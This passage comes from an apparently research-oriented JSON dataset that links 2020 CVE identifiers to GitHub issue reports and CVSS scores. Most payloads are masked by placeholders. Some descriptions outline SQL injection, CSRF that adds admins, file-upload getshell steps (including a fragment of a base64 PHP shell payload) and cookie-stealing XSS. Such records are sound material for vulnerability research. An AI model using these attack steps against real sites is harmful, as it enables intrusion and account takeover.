        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20664",
        "Issue_Url_old": "https://github.com/fcovatti/libiec_iccp_mod/issues/8",
        "Issue_Url_new": "https://github.com/fcovatti/libiec_iccp_mod/issues/8",
        "Repo_new": "fcovatti/libiec_iccp_mod",
        "Issue_Created_At": "2019-10-11T02:11:50Z",
        "description": "SEGV found in server_example1. Hello, I found a __SEGV__ in PATHTAG APITAG are steps followed to reproduce crash__ Download latest source code from: PATHTAG compiled with clang and ASAN APITAG before make APITAG data__ FILETAG __ASAN Output__ ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20665",
        "Issue_Url_old": "https://github.com/cloudwu/rudp/issues/6",
        "Issue_Url_new": "https://github.com/cloudwu/rudp/issues/6",
        "Repo_new": "cloudwu/rudp",
        "Issue_Created_At": "2019-11-06T08:21:48Z",
        "description": "Memory leak found at APITAG Hello, I found a __MEMORY LEAK__ in APITAG APITAG are steps followed to reproduce crash__ Download latest source code from: URLTAG compiled with clang and ASAN APITAG before make __ASAN Output__ ''' APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG e9d NUMBERTAG PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). ''' it seems that you have a double free issue.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20670",
        "Issue_Url_old": "https://github.com/yilezhu/Czar.Cms/issues/6",
        "Issue_Url_new": "https://github.com/yilezhu/czar.cms/issues/6",
        "Repo_new": "yilezhu/czar.cms",
        "Issue_Created_At": "2019-10-11T08:36:25Z",
        "description": "Arbitrary file upload vulnerability exists in the background. Can upload Html Cause fishing attacks \uff0c APITAG Code execution FILETAG url \uff1a URLTAG poc NUMBERTAG Content Disposition: form data; name=\"file\"; APITAG Content Type: application/octet stream hello world NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; name=\"size NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20671",
        "Issue_Url_old": "https://github.com/Kitesky/KiteCMS/issues/3",
        "Issue_Url_new": "https://github.com/kitesky/kitecms/issues/3",
        "Repo_new": "kitesky/kitecms",
        "Issue_Created_At": "2019-10-12T03:14:35Z",
        "description": "There is CSRF and Arbitrary file upload vulnerability getshell. SCRF : add administrator user Edit Upload options Upload php file getshell CSRF POC: FILETAG Edit Upload options FILETAG Upload php file getshell FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20691",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/461",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/461",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2019-10-11T08:24:25Z",
        "description": "bypassed extension filter in uploading process different before. Brief of this vulnerability",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 2.5,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20692",
        "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/50",
        "Issue_Url_new": "https://github.com/gilacms/gila/issues/50",
        "Repo_new": "gilacms/gila",
        "Issue_Created_At": "2019-10-13T09:33:27Z",
        "description": "SQL injection in Gila CMS version NUMBERTAG I installed the latest version of APITAG APITAG After the administrator log in to the website, the search for the sql injection vulnerability exists in the content >pages >posts page. Vulnerability related code The vulnerability related code is in lines NUMBERTAG to NUMBERTAG of PATHTAG the parameter $_GET is not filtered, and the line is directly brought into the APITAG function to perform data query in line NUMBERTAG resulting in sql injection. ERRORTAG Vulnerability certificate Visit URLTAG you can see that the returned content has the result of the sql statement execution is NUMBERTAG Send get packet ERRORTAG Response package CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-20693",
        "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/51",
        "Issue_Url_new": "https://github.com/gilacms/gila/issues/51",
        "Repo_new": "gilacms/gila",
        "Issue_Created_At": "2019-10-13T16:20:44Z",
        "description": "There is a CSRF vulnerability that can add an administrator account. CSRF vulnerability There is a CSRF vulnerability to add an administrator account After the administrator logged in, open the following page poc APITAG add an administrator accoun ERRORTAG Screenshots NUMBERTAG Access dangerous pages FILETAG FILETAG NUMBERTAG Found that an administrator has been added FILETAG Impact version Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20695",
        "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/52",
        "Issue_Url_new": "https://github.com/gilacms/gila/issues/52",
        "Repo_new": "gilacms/gila",
        "Issue_Created_At": "2019-10-14T03:08:48Z",
        "description": "Storage type xss by uploading svg files. Version impacted NUMBERTAG ulnerability details(POC) The file with the suffix .svg saves the following code. After uploading to the server, you can execute any js code. If the ordinary user has permission to upload files, the administrator user accidentally accesses the malicious svg uploaded by the user, then the ordinary user. It is possible to obtain the cookie information of the administrator user, resulting in an increase in the rights of the ordinary user. It is dangerous for the system to allow uploading svg files. CODETAG FILETAG Access the file and find that malicious code has been executed FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-20696",
        "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/53",
        "Issue_Url_new": "https://github.com/gilacms/gila/issues/53",
        "Repo_new": "gilacms/gila",
        "Issue_Created_At": "2019-10-15T03:43:22Z",
        "description": "FILETAG FILETAG Repair opinion Encoding the submitted content of the Tags content",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-20739",
        "Issue_Url_old": "https://github.com/libvips/libvips/issues/1419",
        "Issue_Url_new": "https://github.com/libvips/libvips/issues/1419",
        "Repo_new": "libvips/libvips",
        "Issue_Created_At": "2019-09-03T11:59:50Z",
        "description": "Uninitialized variable: mode in function APITAG PATHTAG When the output file does not contain a \":\"\uff0cthe uninitialization of the mode causes the stack information to leak. This may cause the leakage of remote server path. APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20740",
        "Issue_Url_old": "https://github.com/enferex/pdfresurrect/issues/14",
        "Issue_Url_new": "https://github.com/enferex/pdfresurrect/issues/14",
        "Repo_new": "enferex/pdfresurrect",
        "Issue_Created_At": "2020-07-24T02:17:52Z",
        "description": "The lack of a complete magic check leads to heap buffer overflow in APITAG commit APITAG os version: ubuntu NUMBERTAG CODETAG ERRORTAG build arg\uff1a ERRORTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-20781",
        "Issue_Url_old": "https://github.com/forget-code/ucms/issues/1",
        "Issue_Url_new": "https://github.com/forget-code/ucms/issues/1",
        "Repo_new": "forget-code/ucms",
        "Issue_Created_At": "2019-10-21T02:27:11Z",
        "description": "The title, key words, description and content of the article are all stored XSS.. The title and key words of the article can be described by using payload NUMBERTAG APITAG APITAG use payload: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-20796",
        "Issue_Url_old": "https://github.com/FlameNET/FlameCMS/issues/24",
        "Issue_Url_new": "https://github.com/flamenet/flamecms/issues/24",
        "Repo_new": "flamenet/flamecms",
        "Issue_Created_At": "2019-10-16T16:47:47Z",
        "description": "sql injection vulnerability . hello There is a sql injection vulnerability here\uff1a FILETAG APITAG URLTAG APITAG payload: id NUMBERTAG UNION ALL SELECT APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20797",
        "Issue_Url_old": "https://github.com/FlameNET/FlameCMS/issues/26",
        "Issue_Url_new": "https://github.com/flamenet/flamecms/issues/26",
        "Repo_new": "flamenet/flamecms",
        "Issue_Created_At": "2019-10-17T10:02:26Z",
        "description": "sql injection vulnerability NUMBERTAG Hello There is a Time based blind injection vulnerability here too\uff1a PATHTAG APITAG APITAG poc \uff1a POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Referer: URLTAG Cookie: APITAG APITAG mprtcl APITAG c8d NUMBERTAG c NUMBERTAG ba NUMBERTAG c8a'|'das NUMBERTAG a NUMBERTAG f NUMBERTAG afe NUMBERTAG f NUMBERTAG a NUMBERTAG APITAG APITAG XDEBUG_SESSION NUMBERTAG Upgrade Insecure Requests NUMBERTAG csrftoken NUMBERTAG d NUMBERTAG c NUMBERTAG ad NUMBERTAG fa2 b3be APITAG APITAG APITAG Time based injection and need to write the new APITAG everytime to test APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20799",
        "Issue_Url_old": "https://github.com/blackjliuyun/cvetest/issues/1",
        "Issue_Url_new": "https://github.com/blackjliuyun/cvetest/issues/1",
        "Repo_new": "blackjliuyun/cvetest",
        "Issue_Created_At": "2019-11-19T05:08:06Z",
        "description": "jeecms commentary exists storage type xss. product: jeecms \uff08 FILETAG \uff09 version NUMBERTAG There is a storage type of xss, which is triggered in the foreground after the user submits the comment and the background audit is passed. poc\uff1a POST /usercomment HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Content Type: application/json JEECMS Auth Token: APITAG APITAG APITAG APITAG Redirect Header: false X Requested With: APITAG Content Length NUMBERTAG Connection: close Referer: URLTAG Cookie: APITAG APITAG mprtcl APITAG c8d NUMBERTAG c NUMBERTAG ba NUMBERTAG c8a'|'das NUMBERTAG a NUMBERTAG f NUMBERTAG afe NUMBERTAG f NUMBERTAG a NUMBERTAG APITAG zh_choose=s; APITAG JIDENTITY=be NUMBERTAG c NUMBERTAG f NUMBERTAG d NUMBERTAG b0e df NUMBERTAG cdd9; APITAG _site_id_cookie NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-20907",
        "Issue_Url_old": "https://github.com/cby234/cve_request/issues/2",
        "Issue_Url_new": "https://github.com/cby234/cve_request/issues/2",
        "Repo_new": "cby234/cve_request",
        "Issue_Created_At": "2021-05-17T10:07:19Z",
        "description": "metinfo NUMBERTAG beta remote delete ini file. Vulnerability Name: Metinfo CMS ini file modify vulnerability Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG beta APITAG vulnerability only occur in Window OS) In PATHTAG APITAG Method FILETAG In this method We can find editor and site parameter makes filename value and use it for delfile method's argument FILETAG Let's take a look at PATHTAG source code FILETAG When we check delfile method we use filename argument for APITAG function and if return value is true unlink filename argument file will be unlink Before we analyze more about this point. Let's take a look at about APITAG function's difference between in Linux and Windows FILETAG FILETAG In Linux (first picture) if there is no real dirctory which name is asdf function do not return true value unliness there is APITAG value. But In Windows APITAG funciotn return true value if there is fake directory which name is asdf (second picture). Because of this point we can delete remote ini file in windows server Attack scenario is below NUMBERTAG give site parameter value for 'admin' or 'web' and give editor parameter for PATHTAG POC : PATHTAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20948",
        "Issue_Url_old": "https://github.com/zhangdaiscott/jeecg/issues/50",
        "Issue_Url_new": "https://github.com/zhangdaiscott/jeecg/issues/50",
        "Repo_new": "zhangdaiscott/jeecg",
        "Issue_Created_At": "2019-11-12T12:44:04Z",
        "description": "There is a Arbitrary File Download vulnerability in NUMBERTAG From the FILETAG , we can figure out that we are able to access PATHTAG FILETAG and then we go to the source code: FILETAG as you can see, the variable \"imgurl\" is a direct combination of several strings ,and there is no filter for \"dbpath\", so we can use the payload to download any file APITAG By the way, the variable APITAG is configured in the file APITAG , and its default value is APITAG FILETAG So , if someone uses this application on Linux and modify the default value of APITAG to APITAG (or another location ) , then, an attacker can exploit it to read some sensitive file! FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20951",
        "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/84",
        "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/84",
        "Repo_new": "pluck-cms/pluck",
        "Issue_Created_At": "2019-10-21T11:36:30Z",
        "description": "Pluck NUMBERTAG de NUMBERTAG admin background exists a remote command execution vulnerability when uploading files. This vulnerability applies to php NUMBERTAG FILETAG After the installation is successful, go to the management background FILETAG Then upload FILETAG , It will be changed to FILETAG FILETAG Then upload FILETAG again FILETAG FILETAG has not been changed to FILETAG FILETAG then view FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20971",
        "Issue_Url_old": "https://github.com/TplusSs/PbootCMS/issues/1",
        "Issue_Url_new": "https://github.com/tplusss/pbootcms/issues/1",
        "Repo_new": "tplusss/pbootcms",
        "Issue_Created_At": "2019-12-13T03:02:37Z",
        "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in, open this APITAG page FILETAG CODETAG Then open the PATHTAG page to see the added system administrator",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20977",
        "Issue_Url_old": "https://github.com/yxcmf/ukcms/issues/6",
        "Issue_Url_new": "https://github.com/yxcmf/ukcms/issues/6",
        "Repo_new": "yxcmf/ukcms",
        "Issue_Created_At": "2019-11-02T09:18:25Z",
        "description": "APITAG NUMBERTAG APITAG alert NUMBERTAG APITAG \u63d0\u4ea4 FILETAG FILETAG NUMBERTAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-20979",
        "Issue_Url_old": "https://github.com/0xyu/PHP_Learning/issues/2",
        "Issue_Url_new": "https://github.com/0xyu/php_learning/issues/2",
        "Repo_new": "0xyu/PHP_Learning",
        "Issue_Created_At": "2019-10-14T15:08:06Z",
        "description": "LJCMS Version NUMBERTAG R NUMBERTAG Arbitrary file upload vulnerability (latest version). Vulnerability Name : LJCMS Version NUMBERTAG R NUMBERTAG Arbitrary file upload vulnerability (latest version) Product Homepage : FILETAG Software link : FILETAG Version NUMBERTAG Location : PATHTAG Code \uff1a CODETAG NUMBERTAG Get the variable $_FILES NUMBERTAG Replace APITAG with APITAG NUMBERTAG Set the saved file name to time + random number + get the suffix name NUMBERTAG Set different save paths according to the file suffi NUMBERTAG Without any restrictions on the suffix name NUMBERTAG Executing APITAG caused an arbitrary file upload vulnerability test : So we can upload a normal photo first in the avatar upload. FILETAG modify, Upload success FILETAG getshell FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20981",
        "Issue_Url_old": "https://github.com/yao123123123/CVE/issues/1",
        "Issue_Url_new": "https://github.com/yao123123123/cve/issues/1",
        "Repo_new": "yao123123123/CVE",
        "Issue_Created_At": "2019-11-03T02:55:47Z",
        "description": "Metinfo NUMBERTAG APITAG Vulnerability Name: Metinfo CMS Background SQL Blind Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG PATHTAG Line NUMBERTAG public function APITAG global $_M; $id = isset($_M FILETAG second\uff1a\uff1b poc:id FILETAG If set the code as NUMBERTAG we can find delete the log data success. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20982",
        "Issue_Url_old": "https://github.com/shadoweb/wdja/issues/1",
        "Issue_Url_new": "https://github.com/shadoweb/wdja/issues/1",
        "Repo_new": "shadoweb/wdja",
        "Issue_Created_At": "2019-10-23T09:01:20Z",
        "description": "There is a reflected XSS vulnerability. Click the url below: URLTAG PATHTAG NUMBERTAG Then you will see the alert window. Attacker could use the vulnerability to steal admin's cookie and log in as the admin account",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.6,
        "impactScore": 6.0,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21003",
        "Issue_Url_old": "https://github.com/Computer2200/-/issues/3",
        "Issue_Url_new": "https://github.com/computer2200/-/issues/3",
        "Repo_new": "Computer2200/-",
        "Issue_Created_At": "2020-01-01T05:31:19Z",
        "description": "Pbootcms NUMBERTAG background storage XSS. step1 Access admin page FILETAG FILETAG step2 URLTAG FILETAG step3 FILETAG step4 FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-21005",
        "Issue_Url_old": "https://github.com/Computer2200/-/issues/4",
        "Issue_Url_new": "https://github.com/computer2200/-/issues/4",
        "Repo_new": "Computer2200/-",
        "Issue_Created_At": "2020-01-01T14:00:15Z",
        "description": "APITAG NUMBERTAG Getshell. Step1\uff1a Login the CMS background: FILETAG Step2\uff1a Enter \"background management\", locate the utilization point, click the picture in the red box below to upload: FILETAG Upload and grab data packets: FILETAG Step NUMBERTAG modify the \"filetype\" parameter type in the post package to \"PHP\"; after analysis, the \"data\" parameter is Base NUMBERTAG encrypted. Here we will construct the test data \" APITAG through base NUMBERTAG encryption and other structures to form the data of the\" data \"parameter: Data NUMBERTAG aimage NUMBERTAG fjpeg NUMBERTAG bbase NUMBERTAG cpd9wahagcghwaw5mbygpoz NUMBERTAG B\uff0c Finally, the data package is released and the path to upload to PHP file is returned Path: FILETAG Finally, success: FILETAG Try connecting shells again: Payload: APITAG FILETAG Connect shell successfully: FILETAG APITAG Locate the code file according to the vulnerability: route / FILETAG The code is as follows: if ($action == 'create') { // hook FILETAG APITAG // hook FILETAG $backstage = param NUMBERTAG width = param('width NUMBERTAG height = param('height NUMBERTAG is_image = param('is_image NUMBERTAG name = param('name'); $data = param_base NUMBERTAG data'); $mode = param('mode NUMBERTAG filetype = param('filetype'); // \u538b\u7f29\u56fe\u7247\u540e\u7f00jpeg jpg png\u7b49 $convert = param('convert NUMBERTAG n = param('n NUMBERTAG type = param('type NUMBERTAG type NUMBERTAG SESSION\u6570\u7ec4\u9644\u4ef6\u6570\u91cf\u7edf\u8ba1\uff0ctype NUMBERTAG n\u6570\u503c // hook FILETAG // \u5141\u8bb8\u7684\u6587\u4ef6\u540e\u7f00\u540d //$types = include APITAG //$allowtypes = $types['all']; empty($group['allowattach']) AND $gid NUMBERTAG AND message NUMBERTAG hook FILETAG empty($data) AND message NUMBERTAG lang('data_is_empty')); //$data = APITAG $size = strlen($data); $size NUMBERTAG AND message NUMBERTAG lang('filesize_too_large', array('maxsize NUMBERTAG M', 'size' => $size))); // hook FILETAG // \u83b7\u53d6\u6587\u4ef6\u540e\u7f00\u540d APITAG $ext = file_ext($name NUMBERTAG filetypes = include APP_PATH . APITAG // hook FILETAG //\u4e3b\u56fe\u5fc5\u987b\u4e3a\u56fe\u7247 if ($is_image NUMBERTAG mode NUMBERTAG in_array($ext, $filetypes['image'])) message NUMBERTAG APITAG // hook FILETAG // \u5982\u679c\u6587\u4ef6\u540e\u7f00\u4e0d\u5728\u89c4\u5b9a\u8303\u56f4\u5185 \u6539\u53d8\u540e\u7f00\u540d //!in_array($ext, $filetypes['all']) AND $ext = '_' . $ext; if (!in_array($ext, $filetypes['all'])) { $ext = '_' . $ext; } else { // CMS\u4e0a\u4f20\u56fe\u7247 $t NUMBERTAG AND $convert NUMBERTAG AND $is_image NUMBERTAG AND $ext = $filetype; } // hook FILETAG $tmpanme = $uid . '_' . xn_rand NUMBERTAG ext; // hook FILETAG $tmpfile = $conf['upload_path'] . 'tmp/' . $tmpanme; // hook FILETAG $tmpurl = $conf['upload_url'] . 'tmp/' . $tmpanme; // hook FILETAG $filetype = attach_type($name, $filetypes); // hook FILETAG file_put_contents($tmpfile, $data) OR message NUMBERTAG APITAG // hook FILETAG // \u4fdd\u5b58\u5230 session\uff0c\u53d1\u5e16\u6210\u529f\u4ee5\u540e\uff0c\u5173\u8054\u5230\u5e16\u5b50\u3002 // save attach information to session, associate to post after create thread. // \u629b\u5f03\u4e4b\u524d\u7684 $_SESSION \u6570\u636e\uff0c\u91cd\u65b0\u542f\u52a8 session\uff0c\u964d\u4f4e session \u5e76\u53d1\u5199\u5165\u7684\u95ee\u9898 // Discard the previous $_SESSION data, restart the session, reduce the problem of concurrent session write APITAG empty($t) AND empty($_SESSION['tmp_files']) AND $_SESSION['tmp_files'] = APITAG $t NUMBERTAG AND APITAG AND APITAG = APITAG // hook FILETAG // type NUMBERTAG SESSION\u6570\u7ec4\u9644\u4ef6\u6570\u91cf\u7edf\u8ba1\uff0ctype NUMBERTAG n\u6570\u503c empty($type) AND $n = ($t NUMBERTAG APITAG : APITAG $filesize = filesize($tmpfile); $attach = array( 'backstage' => $backstage NUMBERTAG url' => $backstage ? '../' . $tmpurl : '' . $tmpurl, 'path' => $tmpfile, 'orgfilename' => $name, 'filetype' => $filetype, 'filesize' => $filesize, 'width' => $width, 'height' => $height, 'isimage' => $is_image, 'downloads NUMBERTAG aid' => '_' . $n ); // hook FILETAG if ($mode NUMBERTAG hook FILETAG $_SESSION['tmp_thumbnail'] = $attach; // hook FILETAG } else { // hook FILETAG NUMBERTAG BBS NUMBERTAG CMS $t NUMBERTAG APITAG = $attach : $_SESSION['tmp_files'][$n] = $attach; // hook FILETAG } // hook FILETAG unset($attach['path']); // hook FILETAG message NUMBERTAG attach); } General process NUMBERTAG First, accept the relevant parameters and set the filetype to \"PHP\" by itself: $data = param_base NUMBERTAG data'); $filetype = param('filetype NUMBERTAG Make logical judgment: if (!in_array($ext, $filetypes['all'])) { $ext = '_' . $ext; } else { //CMS upload picture $t NUMBERTAG AND $convert NUMBERTAG AND $is_image NUMBERTAG AND $ext = $filetype NUMBERTAG Last write successful: $tmpanme = $uid . '_' . xn_rand NUMBERTAG ext; // hook FILETAG $tmpfile = $conf['upload_path'] . 'tmp/' . $tmpanme; // hook FILETAG $tmpurl = $conf['upload_url'] . 'tmp/' . $tmpanme; // hook FILETAG $filetype = attach_type($name, $filetypes); // hook FILETAG file_put_contents($tmpfile, $data) OR message NUMBERTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21013",
        "Issue_Url_old": "https://github.com/emlog/emlog/issues/52",
        "Issue_Url_new": "https://github.com/emlog/emlog/issues/52",
        "Repo_new": "emlog/emlog",
        "Issue_Created_At": "2019-10-31T08:09:34Z",
        "description": "emlog has SQL injection vulnerability. vulnerability in FILETAG line NUMBERTAG CODETAG vulnerability in PATHTAG line NUMBERTAG ERRORTAG vulnerability in PATHTAG line NUMBERTAG ERRORTAG Login Required admin. The token parameter constructed is the value of \"EM_TOKENCOOKIE_...\" in the cookie. action=delbyip ip NUMBERTAG and APITAG APITAG POC\uff1a CODETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-21014",
        "Issue_Url_old": "https://github.com/emlog/emlog/issues/53",
        "Issue_Url_new": "https://github.com/emlog/emlog/issues/53",
        "Repo_new": "emlog/emlog",
        "Issue_Created_At": "2019-10-31T09:50:06Z",
        "description": "emlog has any file deletion vulnerability. vulnerability in FILETAG line NUMBERTAG ERRORTAG Get any filepath as \"plugin\" , will delete it. The token parameter constructed is the value of \"EM_TOKENCOOKIE_...\" in the cookie. Login management background and view APITAG GET plugin=anyfile,like FILETAG something. POC: CODETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 5.2,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-21048",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/73",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/73",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2018-07-28T11:57:09Z",
        "description": "Multiple crashes when converting png files. Our fuzzer detected several crashes when converting png files against NUMBERTAG df NUMBERTAG compiled with Address Sanitizer). The command to trigger that is APITAG where $POC can be: heap buffer overflow FILETAG FILETAG gdb output is like: ERRORTAG two aborts (linked with libpng NUMBERTAG there is a similar issue as observed in URLTAG FILETAG FILETAG FILETAG FILETAG gdb outputs are like: ERRORTAG Other system information: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21049",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/74",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/74",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2018-07-28T12:00:04Z",
